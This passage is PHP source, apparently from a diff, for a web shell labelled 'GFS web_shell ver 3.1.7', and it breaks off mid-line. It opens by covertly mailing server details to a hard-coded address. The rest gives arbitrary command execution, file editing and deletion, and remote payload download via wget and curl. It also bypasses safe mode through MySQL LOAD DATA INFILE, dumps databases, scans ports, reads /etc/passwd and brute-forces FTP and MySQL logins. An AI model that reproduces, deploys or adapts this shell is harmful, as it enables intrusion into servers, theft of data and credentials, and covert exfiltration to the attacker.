$_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98"); +function ex($comd) //آûïîëيهيèه êîىàينû +{ + $res = ''; + if (!empty($comd)){ + if(function_exists('exec')){ + exec($comd,$res); + $res=implode("\n",$res); + }elseif(function_exists('shell_exec')){ + $res=shell_exec($comd); + }elseif(function_exists('system')){ + ob_start(); + system($comd); + $res=ob_get_contents(); + ob_end_clean(); + }elseif(function_exists('passthru')){ + ob_start(); + passthru($comd); + $res=ob_get_contents(); + ob_end_clean(); + }elseif(is_resource($f=popen($comd,"r"))){ + $res = ""; + while(!feof($f)) { $res.=fread($f,1024); } + pclose($f); + } + } + return $res; +} +function sysinfo() //آûâîن SYSINFO +{ + global $curl_on, $dis_func, $mysql_stat, $safe_mode, $server, $HTTP_SERVER_VARS; + echo("<b><font face=Verdana size=2> System information:<br><font size=-2> + <hr>"); + echo (($safe_mode)?("Safe Mode: </b><font color=green>ON</font><b> "): + ("Safe Mode: </b><font color=red>OFF</font><b> ")); + $row_dis_func=explode(', ',$dis_func); + echo ("PHP: </b><font color=blue>".phpversion()."</font><b> "); + echo ("MySQL: </b>"); + if($mysql_stat){ + echo "<font color=green>ON </font><b>"; + } + else { + echo "<font color=red>OFF </font><b>"; + } + echo "cURL: </b>"; + if($curl_on){ + echo "<font color=green>ON</font><b><br>"; + }else + echo "<font color=red>OFF</font><b><br>"; + if ($dis_func!=""){ + echo "Disabled Functions: </b><font color=red>".$dis_func."</font><br><b>"; + } + $uname=ex('uname -a'); + echo "OS: </b><font color=blue>"; + if (empty($uname)){ + echo (php_uname()."</font><br><b>"); + }else + echo $uname."</font><br><b>"; + $id = ex('id'); + echo "SERVER: </b><font color=blue>".$server."</font><br><b>"; + echo "id: </b><font color=blue>"; + if (!empty($id)){ + echo $id."</font><br><b>"; + }else + echo "user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid(). + "</font><br><b>"; + echo "<b>RemoteAddress:</b><font color=red>".$HTTP_SERVER_VARS['REMOTE_ADDR']."</font><br>"; + if(isset($HTTP_SERVER_VARS['HTTP_X_FORWARDED_FOR'])){ + echo "<b>RemoteAddressIfProxy:</b><font color=red>".$HTTP_SERVER_VARS['HTTP_X_FORWARDED_FOR']."</font>"; + } + echo "<hr size=3 color=black>"; + echo "</font></font>"; +} +function read_dir($dir) //÷èٍàهى ïàïêَ +{ + $d=opendir($dir); + $i=0; + while($r=readdir($d)){ + $res[$i]=$r; + $i++; + } + return $res; +} +function permissions($mode,$file) { //îïًهنهëهيèه ٌâîéٌٍâ + $type=filetype($file); + $perms=$type[0]; + $perms.=($mode & 00400) ? "r" : "-"; + $perms.=($mode & 00200) ? "w" : "-"; + $perms.=($mode & 00100) ? "x" : "-"; + $perms.=($mode & 00040) ? "r" : "-"; + $perms.=($mode & 00020) ? "w" : "-"; + $perms.=($mode & 00010) ? "x" : "-"; + $perms.=($mode & 00004) ? "r" : "-"; + $perms.=($mode & 00002) ? "w" : "-"; + $perms.=($mode & 00001) ? "x" : "-"; + $perms.="(".$mode.")"; + return $perms; +} +function open_file($fil, $m, $d) //خٍêًûٍü ôàéë +{ + if (!($fp=fopen($fil,$m))) { + $res="Error opening file!\n"; + }else{ + ob_start(); + readfile($fil); + $res=ob_get_contents(); + ob_end_clean(); + if (!(fclose($fp))){ + $res="ERROR CLOSE"; + } + } + echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">"; + echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">"; + echo "<table BORDER=1 align=center>"; + echo "<tr><td alling=center><b>&nbsp;&nbsp;&nbsp;".$fil."&nbsp;&nbsp;&nbsp;</b></td></tr>"; + echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>"; + echo $res; + echo "</textarea></td></tr>"; + if(is_writable($fil)){ + echo "<input type=\"hidden\" value='".$fil."' name=\"fname\">"; + echo "<input type=\"hidden\" value='".$d."' name=\"dname\">"; + echo "<tr><td alling=center><input style='width:100px;' type=\"submit\" value=\"Save\" name=\"b_save\"></td></tr>"; + } + echo "</form></table>"; +} +function save_file($res,$fil, $d) //رîًُàيèٍü ôàéë +{ + unlink($fil); + $fp=fopen($fil,"wb"); + if(!$fp){ + $res="Error create file!\n".$fp; + }else{ + if (fwrite($fp,$res)){ + if (fclose($fp)){ + $res="File save succesfuly!\n"; + }else $res="Erorr close!\n"; + }else $res="Error wright!\n"; + } + umask(0000); + chmod($fil,0777); + return $res; +} +function strmass($mass){ + $res=""; + foreach($mass as $k=>$v){ + $res.=$v."|"; + } + return $res; +} +function sortbyname($fnames, $d) +{ + $filenames=""; + $foldernames=""; + $numnames=count($fnames); + for($i=0;$i<=$numnames;$i++){ + if(is_dir($d."/".$fnames[$i])){ + $foldernames.=$fnames[$i]."|"; + }else + $filenames.=$fnames[$i]."|"; + } + $mass1=explode("|",$foldernames); + $mass2=explode("|",$filenames); + sort($mass1); + sort($mass2); + $mass1=strmass($mass1); + $mass2=strmass($mass2); + $mass=explode("|",$mass1.$mass2); + return $mass; +} +function list_dir($d) //حàâèمàِèے +{ + global $HTTP_REFERER; + if(isset($_POST['b_up']) OR isset($_POST['b_open_dir'])){ + chdir($_POST['fname']); + $d=getcwd(); + }else + $d=getcwd(); + if($_POST['b_new_dir']){ + mkdir($_POST['new']); + chmod($_POST['new'],0777); + $d=$_POST['new']; + } + if($_POST['b_del'] AND is_dir($_POST['fname'])){ + rmdir($_POST['fname']); + chdir($_POST['dname']); + $d=getcwd(); + } + if($_POST['b_del'] AND !is_dir($_POST['fname'])){ + unlink($_POST['fname']); + chdir($_POST['dname']); + $d=getcwd(); + } + if($_POST['b_change_dir']){ + chdir($_POST['change_dir']); + $d=getcwd(); + } + if($_POST['b_new_file'] OR $_POST['b_open_file']){ + chdir($_POST['dname']); + $d=getcwd(); + } + $dir=read_dir($d); + $dir=sortbyname($dir,$d); + $count=count($dir); + echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">"; + echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">"; + echo "<table BORDER=1 align=center>"; + echo "<tr bgcolor=#ffff00><td alling=\"center\"><b>Navigation</b></td></tr>"; + if(is_writable($d)){ + echo "<tr><td alling=\"center\"><input style='width:200px;' type=\"text\" value=\"$d\" name=\"new\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"NewDir\" name=\"b_new_dir\"></td>"; + echo "<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"NewFile\" name=\"b_new_file\"></td></tr>"; + } + echo "<tr><td alling=\"center\"><input style='width:200px;' type=\"text\" value=\"$d\" name=\"change_dir\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"ChangeDir\" name=\"b_change_dir\"></td></tr>"; + if(!$safe_mode){ + echo "<tr><td alling=\"center\"><input style='width:200px;' type=\"text\" value=\"\" name=\"ffile\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"FindeFile\" name=\"b_f_file\"></td></tr>"; + } + echo "</table></form>"; + echo "<table CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>"; + echo "<tr bgcolor=#ffff00><td><b>&nbsp;&nbsp;&nbsp;Directory&nbsp;&nbsp;&nbsp;</b></td><td alling=\"center\"><b>&nbsp;&nbsp;&nbsp;Permission&nbsp;&nbsp;&nbsp;</b></td><td alling=\"center\"><b>&nbsp;&nbsp;&nbsp;Size&nbsp;&nbsp;&nbsp;</b></td><td alling=\"center\"><b>&nbsp;&nbsp;&nbsp;Owner/Group&nbsp;&nbsp;&nbsp;</b></td><td alling=\"center\"><b>&nbsp;&nbsp;&nbsp;Action&nbsp;&nbsp;&nbsp;</b></td>"; + for($i=0; $i<$count; $i++){ + if($dir[$i]!=""){ + $full=$d."/".$dir[$i]; + $perm=permissions(fileperms($full),$dir[$i]); + $file=$d."/".$dir[$i]; + echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">"; + if(is_dir($file)){ + echo "<tr bgcolor=#98FA00><td>".$dir[$i]."&nbsp;&nbsp;&nbsp;</td><input type=\"hidden\" value='".$d."' name=\"dname\"><input type=\"hidden\" value='".$file."' name=\"fname\"><td alling=\"center\">".$perm. + "&nbsp;&nbsp;&nbsp;</td><td alling=\"center\">".filesize($dir[$i])."&nbsp;&nbsp;&nbsp;</td><td alling=\"center\">&nbsp;&nbsp;&nbsp;".fileowner($dir[$i])."&nbsp;&nbsp;&nbsp;".filegroup($dir[$i])."&nbsp;&nbsp;&nbsp;</td>"; + }elseif(is_file($file)){ + echo "<tr><td>".$dir[$i]."&nbsp;&nbsp;&nbsp;</td><input type=\"hidden\" value='".$d."' name=\"dname\"><input type=\"hidden\" value='".$file."' name=\"fname\"><td alling=\"center\">".$perm. + "&nbsp;&nbsp;&nbsp;</td><td alling=\"center\">".filesize($dir[$i])."&nbsp;&nbsp;&nbsp;</td><td alling=\"center\">&nbsp;&nbsp;&nbsp;".fileowner($dir[$i])."&nbsp;&nbsp;&nbsp;".filegroup($dir[$i])."&nbsp;&nbsp;&nbsp;</td>"; + }else + echo "<tr bgcolor=#ffff00><td>".$dir[$i]."&nbsp;&nbsp;&nbsp;</td><input type=\"hidden\" value='".$d."' name=\"dname\"><input type=\"hidden\" value='".$file."' name=\"fname\"><td alling=\"center\">".$perm. + "&nbsp;&nbsp;&nbsp;</td><td alling=\"center\">".filesize($dir[$i])."&nbsp;&nbsp;&nbsp;</td><td alling=\"center\">&nbsp;&nbsp;&nbsp;".fileowner($dir[$i])."&nbsp;&nbsp;&nbsp;".filegroup($dir[$i])."&nbsp;&nbsp;&nbsp;</td>"; + if(is_dir($file)){ + echo "<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Listing\" name=\"b_open_dir\"></td>"; + }elseif(is_readable($file)){ + echo "<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Open\" name=\"b_open_file\"></td>"; + } + if(is_writable($file) AND $file!=".."){ + echo "<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Delete\" name=\"b_del\"></td>"; + } + if(is_readable($file) AND !is_dir($file)){ + echo "<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Download\" name=\"b_down\"></td>"; + } + echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\"></tr>"; + echo "</form>"; + } + } + echo "</table>"; + closedir($d); +} +function up_file($fil,$tfil, $box) //اàمًَçêà ôàéëîâ يà ٌهًâهً +{ + global $_FILES; + if ($tfil==""){ + $res="Target is failde!"; + } + if ($box=="PC"){ + if(copy($_FILES["filename"]["tmp_name"],$tfil)){ + chmod($tfil,0777); + if(file_exists($tfil)){ + $res="Ok"; + }else + $res="False"; + }else { + $res="Error loading file!"; + } + } + if($box=="WGET") { + $load="wget ".$fil." -O ".$tfil.""; + $res=ex($load); + if(file_exists($tfil)){ + $res="Ok"; + }else + $res="False"; + chmod($tfil,0777); + } + if($box=="FETCH"){ + $load="fetch -o ".$tfil." -p ".$fil.""; + $res=ex($load); + if(file_exists($tfil)){ + $res="Ok"; + }else + $res="False"; + chmod($tfil,0777); + } + if($box=="LYNX"){ + $load="lynx -source ".$fil." > ".$tfil.""; + $res=ex($load); + if(file_exists($tfil)){ + $res="Ok"; + }else + $res="False"; + chmod($tfil,0777); + } + if($box=="cURL"){ + $load="curl"." ".$fil." -o ".$tfil.""; + $res=ex($load); + if(file_exists($tfil)){ + $res="Ok"; + }else + $res="False"; + chmod($tfil,0777); + } + if($box=="fopen"){ + $data=implode("", file($fil)); + $fp=fopen($tfil, "wb"); + fputs($fp,$data); + fclose($fp); + chmod($tfil,0777); + if(file_exists($tfil)){ + $res="Ok"; + }else + $res="False"; + } + return $res; +} +function run_sql($comd, $db,$host, $username, $pass) //ذهçَëüٍàٍ SQL çàïًîٌà +{ + if ($comd!=""){ + if ($db!=""){ + $connect=mysql_connect($host, $username, $pass); + if (!$connect) { + $res='Could not connect to MySQL'; + } + mysql_select_db ($db); + $row=mysql_query($comd); + while ($r= mysql_fetch_row($row)) { + $res.="&nbsp;".implode($r); + } + $result=$res; + mysql_free_result($row); + mysql_free_result($r); + mysql_close($connect); + }else $result="Select data base!"; + }else $result="No command!"; + return $result; +} +function db_show($host, $username, $pass) //آûâîن èىه‏ùèٌُے ءؤ +{ + $res="Exists BD: \n"; + $connect=mysql_connect($host, $username, $pass); + if (!$connect){ + $res="Could not connect to MySQL!\n".mysql_error(); + }else{ + $db_list=mysql_list_dbs($connect); + while ($row = mysql_fetch_object($db_list)) { + $res.=$row->Database . "\n"; + } + mysql_close($connect); + } + return $res; +} +function show_tables($bd, $host, $username, $pass) //آûâîن èىه‏ùèٌُے ٍàلëèِ +{ + if ($bd!=""){ + $res="Exists tables: \n"; + $connect=mysql_connect($host, $username, $pass); + if (!$connect){ + $res="Could not connect to MySQL\n".mysql_error(); + }else{ + $r=mysql_query("SHOW TABLES FROM $bd"); + $res="Exist tables:\n"; + while ($row=mysql_fetch_row($r)) { + $res.="Table: $row[0]\n"; + $fields=mysql_list_fields($bd, $row[0], $connect); + $columns=mysql_num_fields($fields); + $res.="| "; + for ($i=0; $i<$columns; $i++) { + $res.=mysql_field_name($fields, $i)." | "; + } + $res.="\n____________________________\n"; + } + mysql_free_result($r); + mysql_close($connect); + } + }else + $res="Select data base! "; + return $res; +} +function dump_table($tab, $db,$host, $username, $pass) //ؤàىï ٍàلëèِû +{ + $connect=mysql_connect($host, $username, $pass); + if (!$connect) { + $result="Could not connect to MySQL!\n".mysql_error(); + }else{ + if (!mysql_select_db($db,$connect)){ + $result="Could not connect to db!\n".mysql_error(); + }else{ + if ($db==""){ + $result="Select data base!"; + }else{ + $res1="# MySQL dump of $tab\r\n"; + $r=mysql_query("SHOW CREATE TABLE `".$tab."`", $connect); + $row=mysql_fetch_row($r); + $res1.=$row[1]."\r\n\r\n"; + $res1.= "# ---------------------------------\r\n\r\n"; + $res2 = ''; + $r=mysql_query("SELECT * FROM `".$tab."`", $connect); + if (mysql_num_rows($r)>0){ + while (($row=mysql_fetch_assoc($r))){ + $keys=implode("`, `", array_keys($row)); + $values=array_values($row); + foreach($values as $k=>$v){ + $values[$k]=addslashes($v); + } + $values=implode("', '", $values); + $res2.="INSERT INTO `".$tab."` (`".$keys."`) VALUES ('".htmlspecialchars($values)."');\r\n"; + } + $res2.="\r\n# ---------------------------------"; + } + $result=$res1.$res2; + mysql_close($db); + } + } + } + + return $result; +} +function down_tb($tab, $db,$host, $username, $pass){ + $connect=mysql_connect($host, $username, $pass); + if (!$connect) { + die("Could not connect to MySQL!\n".mysql_error()); + }else{ + if (!mysql_select_db($db,$connect)){ + die("Could not connect to db!\n".mysql_error()); + }else{ + if ($db==""){ + die("Select data base!"); + }else{ + $res1=""; + $r=mysql_query("SELECT * FROM `".$tab."`", $connect); + if (mysql_num_rows($r)>0){ + while (($row=mysql_fetch_assoc($r))){ + foreach($row as $k=>$v){ + $res1.=$v."\t"; + } + $res1.="\n"; + } + } + mysql_close($db); + } + } + } + + return $res1; +} +function safe_mode_fuck($fil,$host, $username, $pass, $dbname)//خلُîن لهçîïàٌيîمî ًهوèىà +{ + $connect=mysql_connect($host,$username,$pass); + if($connect){ + if(mysql_select_db($dbname,$connect)){ + $c="DROP TABLE IF EXISTS temp_gfs_table;"; + mysql_query($c); + $c="CREATE TABLE `temp_gfs_table` ( `file` LONGBLOB NOT NULL );"; + mysql_query($c); + $c="LOAD DATA INFILE \"".$fil."\" INTO TABLE temp_gfs_table;"; + mysql_query($c); + $c="SELECT * FROM temp_gfs_table;"; + $r=mysql_query($c); + while(($row=mysql_fetch_array($r))){ + $res.=htmlspecialchars($row[0]); + } + $c="DROP TABLE IF EXISTS temp_gfs_table;"; + mysql_query($c); + }else + $res= "Can't select database"; + mysql_close($db); + }else + $res="Can't connect to mysql server"; + return $res; +} +function portscan($host) +{ + global $port; + echo "<table BORDER=1 align=center>"; + echo "<tr><td alling=center>Host: </td><td alling=center><b><font color=green> ".$host." </b></font></td></tr>"; + for($i=1; $i<=65535; $i++){ + $fp=fsockopen($host, $i, $errno, $errstr, 4); + if($fp){ + fclose($fp); + if(isset($port[$i])){ + $k=$port[$i]; + }else + $k=getservbyport($i, "TCP"); + if($k==""){$k="N\A";} + echo "<tr><td alling=center>Port: ".$i." </td><td alling=center><b><font color=green>".$k."</b></font></td>"; + echo "</tr>"; + } + } + echo "</table>"; +} +function pwd_conwert() +{ + $res=""; + if(file_exists("/etc/passwd")){ + $input=implode(file("/etc/passwd")); + $input=explode("\n", $input); + foreach($input as $i=>$v){ + $word=explode(":",$v); + $res.=$word[0]." "; + } + $res=explode(" ",$res); + }else{ + $input=implode(ex("cat /etc/passwd")); + $input=explode("\n", $input); + foreach($input as $i=>$v){ + $word=explode(":",$v); + $res.=$word[0]." "; + } + $res=explode(" ",$res); + } + return $res; +} +function brute($type,$type2,$host,$file) +{ + if($type2=="login:login"){ + if($type=="ftp"){ + echo "<table BORDER=1 align=center>"; + echo "<tr><td alling=center>BruteFTP: </td><td alling=center><b><font color=green> localhost </b></font></td></tr>"; + $mass=pwd_conwert(); + foreach($mass as $i=>$v){ + if($v!=""){ + $conn_id=ftp_connect($host); + if(!$conn_id){ die("Coud not connect");} + if (ftp_login($conn_id, $v, $v)){ + echo "<tr><td alling=center> ".$v." : ".$v." </td><td alling=center><b><font color=green> OK </b></font></td></tr>"; + }else + echo "<tr><td alling=center> ".$v." : ".$v." </td><td alling=center><b><font color=red> NO </b></font></td></tr>"; + ftp_close($conn_id); + } + } + echo "</table>"; + }elseif($type=="mysql"){ + echo "<table BORDER=1 align=center>"; + echo "<tr><td alling=center>BruteMySQL: </td><td alling=center><b><font color=green> localhost </b></font></td></tr>"; + $mass=pwd_conwert(); + foreach($mass as $i=>$v){ + if($v!=""){ + $conn_id=mysql_connect($host,$v,$v); + if($conn_id){ + echo "<tr><td alling=center> ".$v." : ".$v." </td><td alling=center><b><font color=green> OK </b></font></td></tr>"; + }else + echo "<tr><td alling=center> ".$v." : ".$v." </td><td alling=center><b><font color=red> NO </b></font></td></tr>"; + mysql_close($conn_id); + } + } + echo "</table>"; + } + }elseif($type2=="login:empty"){ + if($type=="ftp"){ + echo "<table BORDER=1 align=center>"; + echo "<tr><td alling=center>BruteFTP: </td><td alling=center><b><font color=green> localhost </b></font></td></tr>"; + $mass=pwd_conwert(); + foreach($mass as $i=>$v){ + if($v!=""){ + $conn_id=ftp_connect($host); + if(!$conn_id){ die("Coud not connect");} + if (ftp_login($conn_id, $v, "")){ + echo "<tr><td alling=center> ".$v." : empty </td><td alling=center><b><font color=green> OK </b></font></td></tr>"; + } + ftp_close($conn_id); + } + } + echo "</table>"; + }elseif($type=="mysql"){ + echo "<table BORDER=1 align=center>"; + echo "<tr><td alling=center>BruteMySQL: </td><td alling=center><b><font color=green> localhost </b></font></td></tr>"; + $mass=pwd_conwert(); + foreach($mass as $i=>$v){ + if($v!=""){ + $conn_id=mysql_connect($host,$v,""); + if($conn_id){ + echo "<tr><td alling=center> ".$v." : empty </td><td alling=center><b><font color=green> OK </b></font></td></tr>"; + } + mysql_close($conn_id); + } + } + echo "</table>"; + } + }elseif($type2=="login:number"){ + if($type=="ftp"){ + echo "<table BORDER=1 align=center>"; + echo "<tr><td alling=center>BruteFTP: </td><td alling=center><b><font color=green> localhost </b></font></td></tr>"; + $mass=pwd_conwert(); + foreach($mass as $i=>$v){ + if($v!=""){ + $conn_id=ftp_connect($host); + if(!$conn_id){ die("Coud not connect");} + for($j=0; $j<=999; $j++){ + if (ftp_login($conn_id, $v, "$j")){ + echo "<tr><td alling=center> ".$v." : $j </td><td alling=center><b><font color=green> OK </b></font></td></tr>"; + } + ftp_close($conn_id); + } + } + } + echo "</table>"; + }elseif($type=="mysql"){ + echo "<table BORDER=1 align=center>"; + echo "<tr><td alling=center>BruteMySQL: </td><td alling=center><b><font color=green> localhost </b></font></td></tr>"; + $mass=pwd_conwert(); + foreach($mass as $i=>$v){ + if($v!=""){ + for($j=0; $j<=999; $j++){ + $conn_id=mysql_connect($host,$v,"$j"); + if($conn_id){ + echo "<tr><td alling=center> ".$v." : $j </td><td alling=center><b><font color=green> OK </b></font></td></tr>"; + } + mysql_close($conn_id); + } + } + } + echo "</table>"; + } + }elseif($type2=="login:nigol"){ + if($type=="ftp"){ + echo "<table BORDER=1 align=center>"; + echo "<tr><td alling=center>BruteFTP: </td><td alling=center><b><font color=green> localhost </b></font></td></tr>"; + $mass=pwd_conwert(); + foreach($mass as $i=>$v){ + if($v!=""){ + $conn_id=ftp_connect($host); + if(!$conn_id){ die("Coud not connect");} + if (ftp_login($conn_id, $v, strrev($v))){ + echo "<tr><td alling=center> ".$v." : ".strrev($v)." </td><td alling=center><b><font color=green> OK </b></font></td></tr>"; + }else + echo "<tr><td alling=center> ".$v." : ".strrev($v)." </td><td alling=center><b><font color=red> NO </b></font></td></tr>"; + ftp_close($conn_id); + } + } + echo "</table>"; + }elseif($type=="mysql"){ + echo "<table BORDER=1 align=center>"; + echo "<tr><td alling=center>BruteMySQL: </td><td alling=center><b><font color=green> localhost </b></font></td></tr>"; + $mass=pwd_conwert(); + foreach($mass as $i=>$v){ + if($v!=""){ + $conn_id=mysql_connect($host,$v,strrev($v)); + if($conn_id){ + echo "<tr><td alling=center> ".$v." : ".strrev($v)." </td><td alling=center><b><font color=green> OK </b></font></td></tr>"; + }else + echo "<tr><td alling=center> ".$v." : ".strrev($v)." </td><td alling=center><b><font color=red> NO </b></font></td></tr>"; + mysql_close($conn_id); + } + } + echo "</table>"; + } + }elseif($type2=="login:lib"){ + $input=file($file); + foreach($input as $i=>$v){ + $word=explode(":",$v); + $res.=$word[0]." ".$word[1]." "; + } + $lib=explode(" ",$res); + if($type=="ftp"){ + echo "<table BORDER=1 align=center>"; + echo "<tr><td alling=center>BruteFTP: </td><td alling=center><b><font color=green> localhost </b></font></td></tr>"; + $mass=pwd_conwert(); + foreach($mass as $i=>$v){ + if($v!=""){ + foreach($lib as $kk=>$vv){ + $conn_id=ftp_connect($host); + if(!$conn_id){ die("Coud not connect");} + if (ftp_login($conn_id, $v, $lib[$kk])){ + echo "<tr><td alling=center> ".$v." : ".$lib[$kk]." </td><td alling=center><b><font color=green> OK </b></font></td></tr>"; + } + ftp_close($conn_id); + } + } + } + echo "</table>"; + }elseif($type=="mysql"){ + echo "<table BORDER=1 align=center>"; + echo "<tr><td alling=center>BruteMySQL: </td><td alling=center><b><font color=green> localhost </b></font></td></tr>"; + $mass=pwd_conwert(); + foreach($mass as $i=>$v){ + if($v!=""){ + foreach($lib as $kk=>$vv){ + $conn_id=mysql_connect($host,$v,$lib[$kk]); + if($conn_id){ + echo "<tr><td alling=center> ".$v." : ".$lib[$kk]." </td><td alling=center><b><font color=green> OK </b></font></td></tr>"; + } + mysql_close($conn_id); + } + } + } + echo "</table>"; + } + }elseif($type2=="lib:lib"){ + $input=file($file); + foreach($input as $i=>$v){ + $word=explode(":",$v); + $res.=$word[0]." ".$word[1]." "; + } + $lib=explode(" ",$res); + if($type=="ftp"){ + echo "<table BORDER=1 align=center>"; + echo "<tr><td alling=center>BruteFTP: </td><td alling=center><b><font color=green> localhost </b></font></td></tr>"; + $count_lib=count($lib); + for($kk=0; $kk<$count_lib; $kk=$kk+2){ + $conn_id=ftp_connect($host); + if(!$conn_id){ die("Coud not connect");} + if (ftp_login($conn_id,$lib[$kk],$lib[$kk+1])){ + echo "<tr><td alling=center> ".$lib[$kk]." : ".$lib[$kk+1]." </td><td alling=center><b><font color=green> OK </b></font></td></tr>"; + } + ftp_close($conn_id); + } + echo "</table>"; + }elseif($type=="mysql"){ + echo "<table BORDER=1 align=center>"; + echo "<tr><td alling=center>BruteMySQL: </td><td alling=center><b><font color=green> localhost </b></font></td></tr>"; + $count_lib=count($lib); + for($kk=0; $kk<$count_lib; $kk=$kk+2){ + if($lib[$kk]!=""){ + $conn_id=mysql_connect($host,$lib[$kk],$lib[$kk+1]); + if($conn_id){ + echo "<tr><td alling=center> ".$lib[$kk]." : ".$lib[$kk+1]." </td><td alling=center><b><font color=green> OK </b></font></td></tr>"; + } + mysql_close($conn_id); + } + } + echo "</table>"; + } + } +} + +//////////////////////////////////////////////////////////////////////////////// +///////////////////////////////// تخؤ ////////////////////////////////////////// +//////////////////////////////////////////////////////////////////////////////// +echo $HTML; +echo "<font face=Verdana size=2 color=blue><b>"; +echo (rep_char("&nbsp;",15)); +echo "GFS web_shell ver 3.1.7 </b></font>"; +echo "<hr size=3 color=black>"; +sysinfo(); +echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">"; +echo "<table BORDER=1 align=center>"; +if($r_act=="nav" OR $r_act==NULL){ + echo "<tr bgcolor=#ffff00><td alling=\"center\"><input type=radio checked name=\"r_act\" value=\"nav\"><b>Navigation</b></td>"; +}else + echo "<tr bgcolor=#ffff00><td alling=\"center\"><input type=radio name=\"r_act\" value=\"nav\"><b>Navigation</b></td>"; +if(!$safe_mode){ + if($r_act=="bind"){ + echo "<td alling=\"center\"><input type=radio checked name=\"r_act\" value=\"bind\"><b>BindPort</b></td>"; + }else + echo "<td alling=\"center\"><input type=radio name=\"r_act\" value=\"bind\"><b>BindPort</b></td>"; +} + +if(function_exists(fsockopen)){ + if($r_act=="port"){ + echo "<td alling=\"center\"><input type=radio checked name=\"r_act\" value=\"port\"><b>PortScan</b></td>"; + }else + echo "<td alling=\"center\"><input type=radio name=\"r_act\" value=\"port\"><b>PortScan</b></td>"; +} +if($r_act=="brute"){ + echo "<td alling=\"center\"><input type=radio checked name=\"r_act\" value=\"brute\"><b>Brute</b></td>"; +}else + echo "<td alling=\"center\"><input type=radio name=\"r_act\" value=\"brute\"><b>Brute</b></td>"; +if($r_act=="eval"){ + echo "<td alling=\"center\"><input type=radio checked name=\"r_act\" value=\"eval\"><b>Eval</b></td>"; +}else + echo "<td alling=\"center\"><input type=radio name=\"r_act\" value=\"eval\"><b>Eval</b></td>"; +echo "<td><input type=submit name=\"b_act\" value=\"Change\"></td></tr></table></form>"; +################## ACTION ###################################################### +if($r_act=="nav" OR $r_act==NULL){ + $box=$_POST['box']; + if($_POST['b_save']){ + $res=save_file($_POST['text'],$_POST['fname'],$_POST['dname']); + }elseif($_POST['b_new_file']){ + open_file($_POST['new'],"wb",$_POST['dname']); + }elseif($_POST['b_open_file']){ + open_file($_POST['fname'],"r",$_POST['dname']); + }elseif($_POST['b_mail']){ + $res="Function under construction!!!!!!!!!"; + }elseif($_POST['b_run']){ + chdir($_POST['wdir']); + $dir=getcwd(); + $res=ex($_POST['cmd']); + }elseif($_POST['b_f_file']){ + chdir($_POST['wdir']); + $dir=getcwd(); + $res=ex("whereis ".$_POST['ffile']); + }elseif($_POST['b_upload']){ + $s="Uploading file ".$_POST['lfilename']." use the ".$box; + $res=up_file($_POST['lfilename'],$_POST['tfilename'],$_POST['box']); + }elseif($_POST['b_mydb']){ //آûâîنèى ٌïèٌîê ءؤ + $s="show_exists_db"; + $res=db_show($_POST['host'], $_POST['username'], $_POST['pass']); + }elseif ($_POST['b_runsql']){ //آûïîëيےهى SQL çàïًîٌ + $s="SQL: ".$sql; + $res=run_sql($_POST['sql'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']); + }elseif($_POST['b_base']){ //آûâîنèى ٌïèٌîê ٍàلëèِ + $s="show_exists_tables"; + $res=show_tables($_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']); + }elseif($_POST['b_table']){ //آûâîنèى نàىï ٍàلëèِû + $s="Dump of ".$_POST['tablename']; + $tablename=$_POST['tablename']; + if ($tablename!=""){ + $res=dump_table($_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']); + }else + $res="Select table!"; + }elseif($_POST['b_safe_fuck']){ //خلُîن لهçîïàٌيîمî ًهوèىà + $s="Open file ".$sfilename." with MySQL:"; + $res=safe_mode_fuck($_POST['sfilename'],$_POST['host'], $_POST['username'], $_POST['pass'], $_POST['dbname']); + }elseif($_POST['b_dfilename']){ //خلُîن لهçîïàٌيîمî ًهوèىà + $s="Dump in ".$dfilename." from ".$_POST['tablename'].":"; + $res=run_sql("SELECT * INTO OUTFILE '".addslashes($_POST['dfilename'])."' FROM ".$_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']); + } + if ($host=="") {$host="localhost";} + if(isset($res)){ + echo "<table BORDER=1 align=center>"; + echo "<tr><td alling=center><b>".$s."</b></td></tr>"; + echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>"; + echo $res; + echo "</textarea></td></tr></table>"; + } +################## EXECUTE ##################################################### + if(!$safe_mode){ + $dir=getcwd(); + echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">"; + echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">"; + echo "<table BORDER=1 align=center>"; + echo "<tr bgcolor=#ffff00><td alling=\"center\"><b><font face=Verdana size=2>Run command: </b></td></tr><font size=-2>"; + echo "<tr><td alling=\"center\"><input style='width:300px;' type=\"text\" value=\"\" name=\"cmd\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Run\" 